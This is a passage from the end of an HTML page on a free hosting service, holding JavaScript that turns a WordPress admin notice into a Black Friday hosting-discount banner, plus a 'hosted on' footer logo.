                var button = document.getElementsByClassName("upgrade_button_red")[0]
                  , link = button.parentElement;
                link.setAttribute("href", "https://www.hostinger.com/hosting-starter-offer?utm_source=000webhost&amp;utm_medium=panel&amp;utm_campaign=000-wp"),
                (link.innerHTML = '<button class="upgrade_button_red_sale">Claim Deal</button>'),
                (notification = notification[0]).setAttribute("style", "padding-bottom: 0; padding-top: 5px; background-color: #040713; background-size: cover; background-repeat: no-repeat; color: #ffffff; border-left-color: #040713;"),
                (notification.className = "notice notice-error is-dismissible");
                var mainContentHolder = document.getElementById("main_content");
                mainContentHolder.setAttribute("style", "padding: 0;"),
                hostingerLogo[0].remove();
                var h1Tag = notification.getElementsByTagName("H1")[0];
                (h1Tag.className = "000-h1"),
                (h1Tag.innerHTML = "Black Friday"),
                h1Tag.setAttribute("style", 'color: white; font-family: "Roboto", sans-serif; font-size: 48px; font-weight: 700;');
                var h2Tag = document.createElement("H2");
                (h2Tag.innerHTML = "Up to 90% off 4-year hosting plans + free domain, SSL & DDoS protection"),
                h2Tag.setAttribute("style", 'color: white; margin: 10px 0 15px 0; font-family: "Roboto", sans-serif; font-size: 16px; font-weight: 400; line-height: 1;'),
                h1Tag.parentNode.insertBefore(h2Tag, h1Tag.nextSibling);
                var paragraph = notification.getElementsByTagName("p")[0];
                (paragraph.innerHTML = "$<span style='font-size: 80px;'>2.49</span>/mo"),
                paragraph.setAttribute("style", 'font-family: "Roboto", sans-serif; font-size: 48px; font-weight: 700; margin: 0;');
                var list = notification.getElementsByTagName("UL")[0];
                list.remove();
                var org_html = mainContent.innerHTML
                  , new_html = '<div class="content-wrapper">' + mainContent.innerHTML + '</div><div class="web-hosting-90-off-image-wrapper"><img class="web-hosting-90-off-image" src="https://cdn.000webhost.com/000webhost/promotions/bf-2022-bottom-banner.png"></div>';
                mainContent.innerHTML = new_html;
                var saleImage = mainContent.getElementsByClassName("web-hosting-90-off-image")[0];
            }
        </script>
        <div style="
        text-align: right;
        position: fixed;
        z-index: 9999999;
        bottom: 0;
        width: auto;
        right: 1%;
        cursor: pointer;
        line-height: 0;
        display: block !important;
      ">
            <a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&utm_campaign=000_logo&utm_medium=website&utm_content=footer_img">
                <img src="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png" alt="www.000webhost.com"/>
            </a>
        </div>
        <script>
            function getCookie(t) {
                for (var e = t + "=", n = decodeURIComponent(document.cookie).split(";"), o = 0; o < n.length; o++) {
                    for (var i = n[o]; " " == i.charAt(0); )
                        i = i.substring(1);
                    if (0 == i.indexOf(e))
                        return i.substring(e.length, i.length);
                }
                return "";
            }
            getCookie("hostinger") && ((document.cookie = "hostinger=;expires=Thu, 01 Jan 1970 00:00:01 GMT;"),
            location.reload());
            var wordpressAdminBody = document.getElementsByClassName("wp-admin")[0]
              , notification = document.getElementsByClassName("notice notice-success is-dismissible")
              , hostingerLogo = document.getElementsByClassName("hlogo")
              , mainContent = document.getElementsByClassName("notice_content")[0];
            if (null != wordpressAdminBody && 0 < notification.length && null != mainContent) {
                var googleFont = document.createElement("link");
                (googleFontHref = document.createAttribute("href")),
                (googleFontRel = document.createAttribute("rel")),
                (googleFontHref.value = "https://fonts.googleapis.com/css?family=Roboto:300,400,600,700"),
                (googleFontRel.value = "stylesheet"),
                googleFont.setAttributeNode(googleFontHref),
                googleFont.setAttributeNode(googleFontRel);
                var css = "@media only screen and (max-width: 576px) {#main_content {max-width: 320px !important;} #main_content h1 {font-size: 30px !important;} #main_content h2 {font-size: 40px !important; margin: 20px 0 !important;} #main_content p {font-size: 14px !important;} #main_content .content-wrapper {text-align: center !important;}} @media only screen and (max-width: 781px) {#main_content {margin: auto; justify-content: center; max-width: 445px;}} @media only screen and (max-width: 1325px) {.web-hosting-90-off-image-wrapper {position: absolute; max-width: 95% !important;} .notice_content {justify-content: center;} .web-hosting-90-off-image {opacity: 1;}} @media only screen and (min-width: 769px) {.notice_content {justify-content: space-between;} #main_content {margin-left: 5%; max-width: 445px;} .web-hosting-90-off-image-wrapper {position: absolute; display: flex; justify-content: center; width: 50%; margin-left: 45%;}} .web-hosting-90-off-image {max-width: 90%;} .content-wrapper {min-height: 454px; display: flex; flex-direction: column; justify-content: center; z-index: 5} .notice_content {display: flex; align-items: center;} * {-webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;} .upgrade_button_red_sale{box-shadow: 0 2px 4px 0 rgba(255, 69, 70, 0.2); width: 264px; border: 0; border-radius: 3px; background-color: #FF5C62 !important; padding: 15px 55px !important; font-family: 'Roboto', sans-serif; font-size: 16px; font-weight: 600; color: #ffffff;} .upgrade_button_red_sale:hover{color: #ffffff !important; background: #d10303 !important;}"
                  , style = document.createElement("style")
                  , sheet = window.document.styleSheets[0];
                style.styleSheet ? (style.styleSheet.cssText = css) : style.appendChild(document.createTextNode(css)),
                document.getElementsByTagName("head")[0].appendChild(style),
                document.getElementsByTagName("head")[0].appendChild(googleFont);
                var button = document.getElementsByClassName("upgrade_button_red")[0]
                  , link = button.parentElement;
                link.setAttribute("href", "https://www.hostinger.com/hosting-starter-offer?utm_source=000webhost&utm_medium=panel&utm_campaign=000-wp"),
                (link.innerHTML = '<button class="upgrade_button_red_sale">Claim Deal</button>'),
                (notification = notification[0]).setAttribute("style", "padding-bottom: 0; padding-top: 5px; background-color: #040713; background-size: cover; background-repeat: no-repeat; color: #ffffff; border-left-color: #040713;"),
                (notification.className = "notice notice-error is-dismissible");
                var mainContentHolder = document.getElementById("main_content");
                mainContentHolder.setAttribute("style", "padding: 0;"),
                hostingerLogo[0].remove();
                var h1Tag = notification.getElementsByTagName("H1")[0];
                (h1Tag.className = "000-h1"),
                (h1Tag.innerHTML = "Black Friday"),
                h1Tag.setAttribute("style", 'color: white; font-family: "Roboto", sans-serif; font-size: 48px; font-weight: 700;');
                var h2Tag = document.createElement("H2");
                (h2Tag.innerHTML = "Up to 90% off 4-year hosting plans + free domain, SSL & DDoS protection"),
                h2Tag.setAttribute("style", 'color: white; margin: 10px 0 15px 0; font-family: "Roboto", sans-serif; font-size: 16px; font-weight: 400; line-height: 1;'),
                h1Tag.parentNode.insertBefore(h2Tag, h1Tag.nextSibling);
                var paragraph = notification.getElementsByTagName("p")[0];
                (paragraph.innerHTML = "$<span style='font-size: 80px;'>2.49</span>/mo"),
                paragraph.setAttribute("style", 'font-family: "Roboto", sans-serif; font-size: 48px; font-weight: 700; margin: 0;');
                var list = notification.getElementsByTagName("UL")[0];
                list.remove();
                var org_html = mainContent.innerHTML
                  , new_html = '<div class="content-wrapper">' + mainContent.innerHTML + '</div><div class="web-hosting-90-off-image-wrapper"><img class="web-hosting-90-off-image" src="https://cdn.000webhost.com/000webhost/promotions/bf-2022-bottom-banner.png"></div>';
                mainContent.innerHTML = new_html;
                var saleImage = mainContent.getElementsByClassName("web-hosting-90-off-image")[0];
            }
        </script>
    </body>
</html>
